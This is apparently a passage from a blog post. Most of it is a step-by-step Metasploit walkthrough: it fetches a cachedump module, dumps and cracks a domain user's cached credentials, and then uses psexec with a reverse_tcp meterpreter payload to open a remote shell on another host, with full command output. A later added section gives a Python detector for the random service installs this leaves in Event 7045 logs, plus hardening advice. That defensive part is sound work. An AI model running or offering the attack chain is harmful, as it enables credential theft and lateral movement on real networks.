wget http://lab.mediaservice.net/code/cachedump.rb
2. Save it into the Metasploit module directory (on Backtrack):
mv cachedump.rb /pentest/exploits/framework3/modules/post/windows/gather
3. Load the console, hack something and obtain SYSTEM privileges, then:
meterpreter > run post/windows/gather/cachedump
[*] Executing module against WORKSTATION244
[*] Obtaining the boot key...
[*] Trying 'XP' style...
[*] Getting PolSecretEncryptionKey...
[*] XP compatible client
[*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c
[*] Getting LK$KM...
[*] Dumping cached credentials...
Username          : jdoe
Hash              : 592cdfbc3f1ef77ae95c75f851e37166
Last login        : 2010-05-11 01:43:48
DNS Domain Name   : CONTOSO.CO
Effective Name    : jdo
Full Name         : eJane Do
User ID           : 1107
Primary Group ID  : 513
Additional groups : 33620069 33554432 34013184
Logon domain name : CONTOS
----------------------------------------------------------------------
[*] John the Ripper format:
jdoe:592cdfbc3f1ef77ae95c75f851e37166:CONTOSO.CO:CONTOS
[*] Hash are in MSCACHE format. (mscash)
meterpreter >
4. Crack it:
cat lab.dic | ./john --stdin lab.mscash --format=mscash --pot=lab.pot
Loaded 1 password hash (M$ Cache Hash [Generic 1x])
ASDqwe123        (jdoe)
guesses: 1  time: 0:00:00:00  c/s: 500  trying: ASDqwe123
5. Use it:
meterpreter > background
msf exploit(handler) > route add 10.10.10.0 255.255.255.0 1
msf exploit(handler) > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST X.X.X.X
LHOST => X.X.X.X
msf exploit(psexec) > set LPORT 80
LPORT => 80
msf exploit(psexec) > set SMBDomain Contoso
SMBDomain => Contoso
msf exploit(psexec) > set SMBUser jdoe
SMBUser => jdoe
msf exploit(psexec) > set SMBPass ASDqwe123
SMBPass => ASDqwe123
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  Contoso          no        The Windows domain to use for authentication
   SMBPass    ASDqwe123        no        The password for the specified username
   SMBUser    jdoe             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     X.X.X.X          yes       The listen address
   LPORT     80               yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(psexec) > set RHOST 10.10.10.200
RHOST => 10.10.10.200
msf exploit(psexec) > exploit
[*] Started reverse handler on X.X.X.X:80
[*] Connecting to the server...
[*] Authenticating to 10.10.10.200:445|Contoso as user 'jdoe'...
[*] Uploading payload...
[*] Created \jSlxARUj.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (SyHtwKpn - "MbEXNupOpYUL")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \jSlxARUj.exe...
[*] Meterpreter session 2 opened (X.X.X.X:80 -> X.X.X.X:54430) at Mon Feb 14 22:23:00 +0000 2011
Woot ;-)
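From the defender's side, the psexec step above leaves a very recognisable trace on the target: a service with a random eight-letter name (SyHtwKpn) is installed whose binary is a random eight-letter .exe dropped straight into the system root (\jSlxARUj.exe), started, removed and deleted within a second or two. The following is an added detection example, not code from the original post or from Metasploit: it runs a small heuristic over service-install events (Event ID 7045 in the System log). The event lines are constructed samples in a flattened one-line layout of my own (field names such as ServiceName= and ImagePath= are assumptions, not a real export format), and the thresholds in looks_random() are heuristics, not a vendor rule.

```python
import re

# Constructed sample lines (not real log exports) in a flattened one-line
# layout. Line 1 mirrors what the psexec run above would leave behind; line 2
# is a benign vendor service; line 3 is a state-change event we ignore.
SAMPLE_EVENTS = [
    "2011-02-14T22:22:59 HOST=WS244 EventID=7045 ServiceName=SyHtwKpn "
    "ImagePath=%SYSTEMROOT%\\jSlxARUj.exe StartType=demand start Account=LocalSystem",
    "2011-02-14T08:01:10 HOST=WS244 EventID=7045 ServiceName=Print Spooler Helper "
    "ImagePath=C:\\Program Files\\Vendor\\spoolhlp.exe StartType=auto start Account=LocalSystem",
    "2011-02-14T09:15:00 HOST=WS244 EventID=7036 ServiceName=SyHtwKpn State=running",
]

# Assumed field layout of the constructed lines; adapt to your real export.
EVENT_RE = re.compile(
    r"EventID=(?P<id>\d+) ServiceName=(?P<svc>.+?) ImagePath=(?P<path>.+?) "
    r"StartType=(?P<start>.+?) Account=(?P<acct>\S+)"
)

# Binary placed directly in the system root, with no subdirectory.
SYSROOT_RE = re.compile(r"^(?:%systemroot%|%windir%|c:\\windows)\\[^\\]+\.exe$", re.IGNORECASE)


def case_transitions(s):
    """Count upper/lower case switches between neighbouring letters."""
    return sum(1 for a, b in zip(s, s[1:]) if a.isupper() != b.isupper())


def looks_random(name):
    """Heuristic: short, letters only, and case flips at least three times.

    Generated names like SyHtwKpn or jSlxARUj flip case often; real service
    and binary names (spoolsv, wuauserv, spoolhlp) almost never do.
    """
    return (6 <= len(name) <= 12 and name.isascii() and name.isalpha()
            and case_transitions(name) >= 3)


def parse_event(line):
    """Return the fields of a 7045 service-install line, or None otherwise."""
    m = EVENT_RE.search(line)
    if not m or m.group("id") != "7045":
        return None
    return m.groupdict()


def analyze_events(lines):
    """Flag service installs whose name and binary look machine-generated."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reasons = []
        if looks_random(ev["svc"]):
            reasons.append("random_service_name")
        stem = ev["path"].rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if looks_random(stem):
            reasons.append("random_binary_name")
        if SYSROOT_RE.match(ev["path"]):
            reasons.append("binary_in_system_root")
        # A random service name alone is weak evidence; require a second signal.
        if "random_service_name" in reasons and len(reasons) >= 2:
            findings.append({"service": ev["svc"], "path": ev["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print("suspicious service install:", f)
```

The same heuristic pairs well with the 7036 start/stop events that follow: an install, start and deletion of the same service within a few seconds is the second half of the pattern, and the \svcctl named-pipe bind shown in the exploit output is the network-side counterpart. Limiting what the attack can reuse is a separate control: cached domain credentials are what cachedump read in the first place, so keeping CachedLogonsCount (under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) low on workstations reduces how much there is to crack.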
Cross-posted translation from Room362